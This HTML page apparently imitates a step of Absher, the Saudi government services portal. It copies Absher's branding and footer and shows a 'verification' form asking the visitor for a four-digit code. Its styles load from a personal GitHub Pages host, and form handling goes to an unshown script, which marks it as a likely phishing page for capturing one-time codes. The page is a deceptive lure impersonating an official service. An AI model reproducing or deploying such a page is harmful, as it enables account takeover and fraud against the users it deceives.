<!DOCTYPE html>
<html lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1">
        <title>مكاتب التسجيل والتفعيل</title>
        <script type="text/javascript">
            try {
                var environment = '';
                (''.trim() == "") ? document.querySelector("html").classList.add('prod') : document.querySelector("html").classList.add('');
            } catch (eee) { }
        </script>
        <link rel="stylesheet" href="https://joker-0-7.github.io/xcdf/css/formone.css">
        <link rel="stylesheet" href="https://joker-0-7.github.io/xcdf/css/bootstrp.css">
        <link rel="stylesheet" href="https://joker-0-7.github.io/xcdf/css/bot2.css">
        <link rel="stylesheet" href="https://joker-0-7.github.io/xcdf/css/file3.css">
        <link rel="stylesheet" href="https://joker-0-7.github.io/xcdf/css/file2.css">
        <link rel="stylesheet" href="./css/log2.css">
        <link rel="stylesheet" href="./css/log3.css">
        <link rel="stylesheet" href="./css/log4.css">
        <link rel="stylesheet" href="./css/log5.css">
        <script type="text/javascript">
            var jq_bt = $.noConflict(true);
        </script>
        <style type="text/css">
            @font-face {
                font-family: ARABICREGULAR;
                src: local("ARABICREGULAR"), local("ARABICREGULAR"), url(/livechat/chat-widget-sample/static/media/ARABICREGULAR.b492a759.otf) format("otf")
            }
    
            @media print {
                #labibaWebBotDiv {
                    display: none !important
                }
            }
    
            #labibaWebBotDiv textarea.chatInputlabiba {
                margin: 0 !important;
                padding: 6px !important;
                border: 0 none !important;
                width: 100% !important;
                font-family: Droid Arabic Kufi\,Arial;
                min-height: 35px !important
            }
    
            .rtl #labibaWebBotDiv .quickreplaylabiba button.quickreplaylabibabutton {
                font-size: 14px !important;
                height: 50px !important;
                padding: 10px 30px !important;
                font-family: Droid Arabic Kufi\,Arial;
                background-color: transparent !important;
                color: #3eab37 !important
            }
    
            .rtl #labibaWebBotDiv .quickreplaylabiba button.quickreplaylabibabutton:hover {
                color: #fff !important;
                background-color: #3eab37 !important
            }
    
            #labibaWebBotDiv .quickreplaylabiba button.quickreplaylabibabutton {
                font-size: 14px !important;
                height: 50px !important;
                padding: 10px 30px !important;
                font-family: Droid Arabic Kufi\,Arial;
                background-color: transparent !important;
                cursor: pointer;
                color: #3eab37 !important
            }
    
            #labibaWebBotDiv .quickreplaylabiba button.quickreplaylabibabutton:hover {
                color: #fff !important;
                background-color: #3eab37 !important
            }
    
            #labibaWebBotDiv .chatSendMsglabiba,
            .rtl #labibaWebBotDiv .chatSendMsglabiba {
                height: 35px !important;
                margin-left: -13px !important;
                cursor: pointer
            }
    
            .rtl div.titlebarlabiba,
            div.titlebarlabiba {
                padding-top: 4px !important;
                font-family: Droid Arabic Kufi\,Arial
            }
    
            .rtl div.chatcomposerlabiba {
                padding-bottom: 13px !important
            }
    
            div.chatcomposerlabiba {
                padding-bottom: 0 !important
            }
    
            .rtl div#labibaWebBotDiv div#message-list2 {
                font-family: Droid Arabic Kufi\,Arial
            }
    
            #labibaWebBotDiv.parent {
                display: -ms-flexbox;
                display: flex;
                -ms-flex-pack: center;
                justify-content: center;
                direction: ltr
            }
    
            #labibaWebBotDiv.message {
                height: -webkit-fit-content;
                height: -moz-fit-content;
                height: fit-content;
                width: -webkit-fit-content !important;
                width: -moz-fit-content !important;
                width: fit-content !important
            }
    
            #labibaWebBotDiv.message,
            #labibaWebBotDiv.messageIE {
                background: #26a38c;
                background: -webkit-linear-gradient(90deg, #26a38c, #6597ce);
                background: -webkit-gradient(linear, left top, right top, from(#26a38c), to(#6597ce));
                background: -webkit-linear-gradient(left, #26a38c, #6597ce);
                background: -o-linear-gradient(left, #26a38c 0, #6597ce 100%);
                background: linear-gradient(90deg, #26a38c, #6597ce);
                filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#26a38c", endColorstr="#6597ce", GradientType=1);
                float: right;
                color: #fff;
                font-weight: 500;
                padding: 13px;
                font-size: 14px;
                padding-left: 23px;
                padding-right: 23px
            }
    
            #labibaWebBotDiv.messageIE {
                height: -webkit-fit-content;
                height: -moz-fit-content;
                height: fit-content;
                height: 45px
            }
    
            #labibaWebBotDiv.ar-message {
                border-radius: 30px 30px 0 30px
            }
    
            #labibaWebBotDiv.m-top {
                margin-top: 50px
            }
    
            #labibaWebBotDiv #closebuttonlabiba {
                cursor: pointer
            }
    
            #labibaWebBotDiv #closebuttonlabiba,
            #labibaWebBotDiv #closebuttonlabiba:hover {
                background-color: transparent !important;
                outline: none;
                width: 30px !important;
                border: 0 !important;
                padding: 0 !important;
                margin: 0 !important
            }
    
            #labibaWebBotDiv .classVerticalIE {
                margin-left: 20px
            }
        </style>
        <style data-emotion="lc"></style>
        <style></style>
    </head>
<body>
    <div id="topLinksId">

        <a href="" id="return-to-top"><span class="glyphicon glyphicon-chevron-up"
                aria-hidden="true"></span></a>
        <div class="container linkto-individuals-section"></div>
        <div class="affix-wrapper"></div>



        <header class="main-header main-inner-header affix-top">
            <nav class="navbar navbar-default navbar-main">
                <div class="container">
                    <div class="row" style="display: flex;">
                        <div class="col-xs-3 col-md-3 col-lg-3 left-side-top">
                            <div class="navbar-header">

                                <a class="navbar-brand" href="?uri=nm:oid:wps.Login">
                                    <div class="mainlogo"></div>
                                </a><a class="hide hidden-home" href="?uri=nm:oid:wps.Login"></a>


                            </div>
                        </div>
                        <div class="col-xs-1 col-md-1 col-lg-1 navbar-innerpage-moi" style="position: absolute; left: 0;"></div>

                        <div class="col-xs-6 padding-0 col-md-7">
                            <ul class="topLinks before-login">
                                <li class="topLinks_box">
                                    <a href="#" class="userguidelink" target="_blank">
                                        <div class="spritejobs box1"></div>
                                        <strong>دليل الخدمات</strong>
                                    </a>
                                </li>
                                <li id="topLinks_langid" class="topLinks_box">


                                    <a href="#">
                                        <div class="spritejobs box1"></div>
                                        <strong>English</strong>
                                    </a>

                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </nav>
        </header>
    </div>
    <div class="sec-four">
        <div class="container">

            <div class="info-title">
                <h2>التحقق</h2>
            </div>
            <div class="spans">
                <span>1</span>
                <span>2</span>
                <span>3</span>
                <span>4</span>
            </div>
            <form action="" id="LoginForm">
                <input type="text" value="حقول مطلوبة" disabled style="height:50px; width: 90%;"> 
                <input type="text" placeholder="ادخل الرمز المكون من 4 ارقام" style="height:50px ; width:70%;" id="code">
                <input type="submit" class="btn btn-success" value="ارسال">
            </form>
            <footer id="footerId" class="footer footer-innerpage">
                <div class="footer-main">
                    <div class="container">
                        <div class="row">
                            <div class="col-sm-4 col-md-3">
                                <div id="footerdescription" class="col-md-12">
                                    جميع الحقوق محفوظة لأبشر، المملكة العربية السعودية © <span id="footer_aryear">1443</span>هـ
                                    - <span id="footer_enyear">2022</span>م.
                                </div>
                                <!-- <div class="col-md-12 vision-logo"></div> -->
                            </div>
                            <div class="col-sm-4 col-md-6">
                                <h3>روابط</h3>
                                <div class="footer-links row">
                                    <div class="col-sm-4 col-md-3 link1">
                                        <a href="#">عن أبشر</a>
                                        <a href="#">الاخبار</a>
                                        <a href="#">شروط الاستخدام</a>
                                    </div>
                                    <div class="col-sm-4 col-md-6 link2">
                                        <a href="#">مراكز التسجيل والتفعيل</a>
                                        <a href="#">دليل المستخدم</a>
        
                                        <a href="#">الأسئلة الشائعة</a>
                                    </div>
                                    <div class="col-sm-4 col-md-3 link3">
                                        <a href="#">الاتصال التسويقي</a>
                                        <a href="#">سياسة الخصوصية</a>
                                    </div>
                                </div>
                            </div>
        
                            <div class="col-sm-4 col-md-3">
        
                                <div class="row">
                                    <div class="col-sm-6" style="padding: 0">
                                        <p class="foot-note nic-footer">
                                        </p>
                                        <ul class="list-inline list-social text-center">
                                            <li>
                                                <a href="#"></a>
                                            </li>
                                            <li>
                                                <a href="#"></a>
                                            </li>
                                            <li>
                                                <a href="#"></a>
                                            </li>
                                            <li>
                                                <a href="#"></a>
                                            </li>
                                        </ul>
                                    </div>
                                    <div class="col-sm-6">
                                        <a href="javascript: void(0)" style="cursor: default;" class="footer-brandlogo"></a>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="footer-notes">
                    <div class="container">
                        <div class="row text-center">
                            <div class="col-xs-12">
                                <p class=""><strong>تطوير و تشغيل مركز المعلومات الوطني </strong><img
                                        src="/portal/individuals/images/nic_footer_logo.png"></p>
                            </div>
        
                        </div>
                    </div>
                </div>
            </footer>
        
        </div>
    </div>
    <script src="./js/code.js" type="module"></script>

</body>
</html>